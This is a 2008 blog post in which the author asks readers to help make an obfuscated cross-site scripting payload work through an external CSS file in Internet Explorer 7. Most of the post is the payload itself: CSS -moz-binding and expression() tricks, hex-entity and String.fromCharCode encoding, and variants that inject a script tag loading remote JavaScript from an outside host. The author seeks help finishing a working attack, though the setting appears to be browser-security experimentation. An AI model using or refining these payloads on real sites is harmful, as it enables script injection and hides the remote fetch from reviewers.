Share and let Internet Comunity make backups for your work


XSS
January 20, 2008, 2:43 am
Filed under: security

Your Opinion Counts

OK, I had to do this…

 After (2 long) days of testing a re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection and because I didn’t want to make that awesome page a mess with my comments.

So this page is dedicated to those people who can and will help me solve this – especially Gareth Heyes. who takes the credit for all this.

The facts:

We have this XSS injection “hackvectoreted” below:

<div style=”\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C
&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C
&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E
&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20
&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D
&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F
&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B
&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65
&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45
&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31
&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C
&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31
&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65
&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65
&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34
&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34
&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31
&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34
&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C
&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C
&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C
&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31
&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C
&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B
&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67
&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42
&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35
&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31
&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20
&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43
&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B
&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31
&#x3B&#x27&#x29 : 1);” id=”inject”>test</div>

 If we have to copy paste (and remove line breaks) into the HTML code this should work fine both FF and IE70 BUT what I would love to do is make this work through a css file.

This should be an easy task but let’s have a look.

I have this test.html file like this one below (this was done using the link method and could be done using @import method but I’m pretty sure this is not the point)

<html>
<body>

<link rel=”stylesheet” type=”text/css” href=”test.css” mce_href=”test.css”>
<div id=”navigation”>– Test –</div>

</body>
</html>

And a css file named test.css like this one below (remember line breaks):

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\
.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x6
5&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x7
7&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3
F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x6
9&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6
F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x6
5&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6
D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2
C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x3
1&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x4
1&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x3
1&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x3
1&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x3
1&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x3
8&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2
C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x3
1&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x3
0&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x3
1&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x3
7&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x3
8&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x3
1&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x3
0&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x3
1&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x7
5&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x6
5&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x3
5&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2
C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x7
0&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x2
9&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x2
7&#x29 : 1);

Now we run a test – FF shows what it was supposed to show “XBL XSS” and this means it works BUT IE70 does nothing instead of running this js code http://businessinfo.co.uk/labs/xss/xss.js well hidden with <@tocharcodes> and <@hex_ent> using the hackvector

You can test this by using FF or IE7 here.

Of course I’ve tried many many different variations of this XSS injection and googled till my eyes blowened out but none of them worked – at least not for IE70. I had to admit I’ve learned something about the css’s becasue I was 0 here but right now I’m just tired of learning and need an answer so please make my day and give me the answer and if you do please make sure the last noob on earth will understand this.

Other variations of the test.css file you’ll find below:

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}

OR

div#navigation
{
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}

I ask for 5 minutes off your time and I welcome your comments